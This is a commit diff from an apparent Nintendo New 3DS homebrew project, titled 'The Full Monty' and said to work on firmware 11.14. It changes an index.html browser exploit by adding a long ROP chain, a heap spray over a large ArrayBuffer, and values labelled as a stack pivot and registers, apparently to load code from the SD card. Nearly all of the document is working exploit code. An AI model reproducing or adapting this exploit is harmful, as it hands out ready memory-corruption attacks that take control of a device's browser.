The Full Monty

Works on 11.14 new3ds US, EU, JP only.
zoogie · Dec 5, 2020 · fd3c77a · fd3c77a
1 parent 3fad412
commit fd3c77a
Showing 1 changed file with 13 additions and 7 deletions.
diff --git a/index.html b/index.html
@@ -1,19 +1,25 @@
 @import "#4444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444   	44444444444444444444444";
 <script>
 function spray(size) {
-	var obj= new ArrayBuffer(size); 
+
+	var rop = [0x0027f4ec, 0x001e23d8, 0x001e25cc, 0x09320000, 0x019314ff, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x0022a5d0, 0x0027f4ec, 0x001e23d8, 0x001e25cc, 0x00202a04, 0x09320000, 0x00000004, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x0029c908, 0x0027f4ec, 0x001e23d8, 0x001e25cc, 0x3a45c000, 0x00010000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00d1945c, 0x0027f4ec, 0x001e23d8, 0x001e25cc, 0x09320000, 0x636d6473, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x0022a5d0, 0x0027f4ec, 0x001e23d8, 0x001e25cc, 0x09320004, 0x0000003a, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x0022a5d0, 0x0027f4ec, 0x001e23d8, 0x001e25cc, 0x09320000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x0031ff14, 0x00266360, 0x00000000, 0x0027f4ec, 0x001e25cc, 0x001e25cc, 0x09320000, 0x0a000000, 0x00000000, 0x00800000, 0x00000000, 0x00000000, 0x00000000, 0x00267100, 0x00000001, 0x00000000, 0x00000000, 0x00000008, 0x00000000, 0x00000000, 0x00000000, 0x0027f4ec, 0x001e23d8, 0x001e25cc, 0x09320000, 0x00000014, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00d1945c, 0x00313170, 0x09320010, 0x00640073, 0x0063006d, 0x002f003a, 0x00720061, 0x0031006d, 0x00630031, 0x0064006f, 0x00000000, 0x007776cd, 0x00000000, 0x00000000, 0x00000000, 0x00313170, 0x0932002c, 0x002e0065, 0x00690062, 0x0000006e, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x007776cd, 0x00000000, 0x00000000, 0x00000000, 0x0027f4ec, 0x001e23d8, 0x001e25cc, 0x09320040, 0x09320010, 0x00000030, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00d1947c, 0x0027f4ec, 0x001e23d8, 0x001e25cc, 0x09320000, 0x09320040, 0x00000001, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x003298ac, 0x00266360, 0x00000000, 0x0027f4ec, 0x001e23d8, 0x001e25cc, 0x09320000, 0x09320020, 0x3a45d000, 0x00008000, 0x00000000, 0x00000000, 0x00000000, 0x00313294, 0x00266360, 0x00000000, 0x0029b468, 0x09320000, 0x0027f4ec, 0x001e23d8, 0x001fa8c0, 0x0027f4ec, 0x001e23d8, 0x001dfbc4, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x001ef590, 0x0027f4ec, 0x001e23d8, 0x001e25cc, 0x3a45d000, 0x00008000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x002a2100, 0x00313170, 0x09320010, 0x00000000, 0x001f4dec, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x001ed8c8, 0x00000000, 0x007776cd, 0x00000000, 0x00000000, 0x00000000, 0x00313170, 0x0932002c, 0x002a6b0c, 0x002a2100, 0x003298ac, 0x001ef590, 0x001f4e1c, 0x00000000, 0x00000000, 0x00000000, 0x007776cd, 0x00000000, 0x00000000, 0x00000000, 0x0027f4ec, 0x001e23d8, 0x001e25cc, 0x3a45c000, 0x09320010, 0x00000030, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00d1947c, 0x00313170, 0x09320010, 0x00000000, 0x00313294, 0x0032ea40, 0x0029c908, 0x00000000, 0x00000000, 0x00000048, 0x00000000, 0x007776cd, 0x00000000, 0x00000000, 0x00000000, 0x00313170, 0x0932002c, 0x00000000, 0x00000000, 0x00000000, 0x003e93d0, 0x00000114, 0x00000000, 0x00000000, 0x00000000, 0x007776cd, 0x00000000, 0x00000000, 0x00000000, 0x0027f4ec, 0x001e23d8, 0x001e25cc, 0x3a45c030, 0x09320010, 0x00000030, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00d1947c, 0x00313170, 0x09320010, 0x00000000, 0x3a45d000, 0x00643738, 0x00d1a074, 0x00d19bd4, 0x00d1a1e4, 0x00d19bdc, 0x00000000, 0x007776cd, 0x00000000, 0x00000000, 0x00000000, 0x00313170, 0x0932002c, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x007776cd, 0x00000000, 0x00000000, 0x00000000, 0x0027f4ec, 0x001e23d8, 0x001e25cc, 0x3a45c060, 0x09320010, 0x00000030, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00d1947c, 0x0027f4ec, 0x001e25cc, 0x001e25cc, 0x3a45d000, 0x3b1336e0, 0x00008000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x002a6b0c, 0x00000000, 0x00000000, 0x00000000, 0x00000008, 0x00000000, 0x00000000, 0x00000000, 0x0027f4ec, 0x001e23d8, 0x001e25cc, 0x3b9aca00, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x002de664, 0x0027f4ec, 0x001e23d8, 0x001e25cc, 0x09320000, 0x01808080, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x0022a5d0, 0x0027f4ec, 0x001e25cc, 0x001e25cc, 0x00202a04, 0x09320000, 0x00000004, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x0029c908, 0x3a45c000, 0x0fff9000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x0027f4ec, 0x001e23d8, 0x005646e0, 0x70707070];
+
+	var obj= new ArrayBuffer(0x2000000); 
 	var payload = new Uint32Array(obj);
-	for(var i=0; i < 0x200000/4;i++){
-		payload[i]=0x09202204;
-	}
+	for(var i=0; i < 0x200000/4;i++) payload[i]=0x09202204;
+
 	payload[0xbc020/4]=0x09202100;
-	//payload[0xbc040/4]=0x09202004;
 	payload[0xbc204/4]=0x09202204;
-	payload[0xbc220/4]=0xDEADC0DF;
+	payload[0xbc220/4]=0x00aca468; //stack pivot
+	payload[0xbc200/4]=0x001e23d8; //pc
+	payload[0xbc1fc/4]=0x88888888; //lr
+	payload[0xbc1f8/4]=0x09300000; //sp
+
+	for(var j=0; j < rop.length; j++) payload[(0x1ba000/4)+j]=rop[j]; //0x09300000
 }
 spray(0x2000000);
 
 </script>
 <style>
 @import "index.html";
-</style>
+</style>